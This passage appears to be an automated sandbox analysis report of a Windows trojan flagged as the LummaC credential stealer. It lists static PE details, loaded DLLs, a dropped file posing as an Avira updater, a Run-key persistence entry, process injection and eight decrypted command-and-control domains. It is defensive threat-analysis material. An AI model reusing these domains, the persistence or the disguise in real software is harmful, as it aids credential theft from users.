            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087C4CF0_2_0087C4CF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087E4170_2_0087E417
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087BC130_2_0087BC13
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087D0180_2_0087D018
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087A84D0_2_0087A84D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0086BC580_2_0086BC58
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087A4670_2_0087A467
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087C46D0_2_0087C46D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008664730_2_00866473
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00864D8B0_2_00864D8B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008655AD0_2_008655AD
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0086E9C40_2_0086E9C4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087BDD70_2_0087BDD7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087B5D90_2_0087B5D9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008799E40_2_008799E4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0085B9F60_2_0085B9F6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087BD0E0_2_0087BD0E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087B5090_2_0087B509
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0086352E0_2_0086352E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00855D310_2_00855D31
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087D1310_2_0087D131
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0086D9450_2_0086D945
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087A94E0_2_0087A94E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008669770_2_00866977
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087AE8E0_2_0087AE8E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00863AC80_2_00863AC8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087B2D30_2_0087B2D3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00879ED30_2_00879ED3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00859AF20_2_00859AF2
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0085B6100_2_0085B610
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087A2190_2_0087A219
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0085BA290_2_0085BA29
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0085BA320_2_0085BA32
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00867A510_2_00867A51
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008663860_2_00866386
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008527860_2_00852786
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008697890_2_00869789
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087DB880_2_0087DB88
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00863B940_2_00863B94
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00878B990_2_00878B99
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087D3AC0_2_0087D3AC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087CBD00_2_0087CBD0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087B7DA0_2_0087B7DA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087C7FF0_2_0087C7FF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00879B090_2_00879B09
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0085A33F0_2_0085A33F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0087C37E0_2_0087C37E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0086D37A0_2_0086D37A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0089A2D10_2_0089A2D1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008AC0B30_2_008AC0B3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0088801C0_2_0088801C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0089743B0_2_0089743B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008970470_2_00897047
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0089685E0_2_0089685E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00896DBE0_2_00896DBE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008975060_2_00897506
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0089751E0_2_0089751E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0089597E0_2_0089597E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00897AC80_2_00897AC8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008ABEC80_2_008ABEC8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008AC6400_2_008AC640
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00895B800_2_00895B80
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0089A7B60_2_0089A7B6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008997CE0_2_008997CE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008967C50_2_008967C5
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00898BD00_2_00898BD0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008963050_2_00896305
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_008983690_2_00898369
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0089777C0_2_0089777C
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeStatic PE information: Resource name: BRANDING type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
            Source: AviraOculus.exe.0.drStatic PE information: Resource name: BRANDING type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000000.1670551878.0000000000693000.00000008.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebranding.dll\ vs SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000002.1887265093.00000000026D7000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebranding.dll\ vs SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000000.1670643348.0000000000767000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStarlight SoftwaresH( vs SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000002.1886487919.00000000007D0000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameStarlight SoftwaresH( vs SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000002.1887265093.00000000029D0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStarlight SoftwaresH( vs SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000000.1670643348.00000000006F7000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebranding.dll\ vs SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1841998884.0000000002870000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameStarlight SoftwaresH( vs SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1841998884.0000000002577000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamebranding.dll\ vs SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeBinary or memory string: OriginalFilenamebranding.dll\ vs SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeBinary or memory string: OriginalFilenameStarlight SoftwaresH( vs SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
            Source: classification engineClassification label: mal100.troj.evad.winEXE@3/1@10/7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeFile created: C:\Users\user\Music\AviraUpdaterJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeReversingLabs: Detection: 18%
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeString found in binary or memory: FileKey1=%CommonAppData%\Photodex\ProShow|photodex-presenter-install.log
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeString found in binary or memory: FileKey2=%CommonAppData%\Photodex\ProShow Producer|photodex-presenter-install.log
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe"
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeSection loaded: k7rn7l32.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeSection loaded: ntd3ll.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeSection loaded: webio.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeSection loaded: dpapi.dllJump to behavior
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeStatic file information: File size 4547072 > 1048576
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeStatic PE information: section name: RT_CURSOR
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeStatic PE information: section name: RT_BITMAP
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeStatic PE information: section name: RT_ICON
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeStatic PE information: section name: RT_MENU
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeStatic PE information: section name: RT_DIALOG
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeStatic PE information: section name: RT_STRING
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeStatic PE information: section name: RT_ACCELERATOR
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeStatic PE information: section name: RT_GROUP_ICON
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x28f800
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x1b6400
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeStatic PE information: real checksum: 0x3bbe17 should be: 0x456a52
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeStatic PE information: section name: .didata
            Source: AviraOculus.exe.0.drStatic PE information: section name: .didata
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00856882 pushad ; retf 0_2_00856893
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00856898 pushad ; retf 0_2_00856899
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00856D9B push esp; retf 0_2_00856D9C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00856DAA push eax; retf 0_2_00856DAB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00856D36 push esp; retf 0_2_00856D3B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_0085529B pushfd ; retf 0_2_0085529D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00855301 pushfd ; retf 0_2_00855303
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00856F53 push eax; retf 0_2_00856F55
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00889C6A push esp; iretd 0_2_00889C6B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00889C63 push esp; iretd 0_2_00889C65
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00889C78 push eax; iretd 0_2_00889C7A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeCode function: 0_2_00889C73 push eax; iretd 0_2_00889C74
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeFile created: C:\Users\user\Music\AviraUpdater\AviraOculus.exeJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OculusAviraJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OculusAviraJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeDropped PE file which has not been started: C:\Users\user\Music\AviraUpdater\AviraOculus.exeJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeAPI coverage: 9.2 %
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe TID: 1508Thread sleep time: -30000s >= -30000sJump to behavior
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000002.1966172474.0000000000B9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1883393445.0000000000BC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW4
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1883393445.0000000000BC2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe"Jump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeMemory written: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe base: 8B0000 value starts with: 4D5AJump to behavior
            LummaC encrypted strings found
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: reinforcenh.shop
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: stogeneratmns.shop
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: fragnantbui.shop
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: drawzhotdog.shop
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: vozmeatillu.shop
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: offensivedzvju.shop
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: ghostreedmnu.shop
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: gutterydhowi.shop
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000002.1887265093.000000000296F000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000000.1670643348.0000000000706000.00000002.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1841998884.000000000280F000.00000004.00000800.00020000.00000000.sdmp, AviraOculus.exe.0.drBinary or memory string: DetectFile1=%ProgramFiles%\Malwarebytes' Anti-Malware\mbam.exe
            Source: SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000002.1887265093.000000000296F000.00000004.00001000.00020000.00000000.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000000.00000000.1670643348.0000000000706000.00000002.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe, 00000002.00000003.1841998884.000000000280F000.00000004.00000800.00020000.00000000.sdmp, AviraOculus.exe.0.drBinary or memory string: DetectFile2=%ProgramFiles%\Malwarebytes Anti-Malware\mbam.exe

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe.2500000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe.2500000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1886487919.00000000007D0000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

            Remote Access Functionality

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe.2500000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.SecuriteInfo.com.Trojan.Win32.Crypt.24800.18482.exe.2500000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1887027277.0000000002500000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
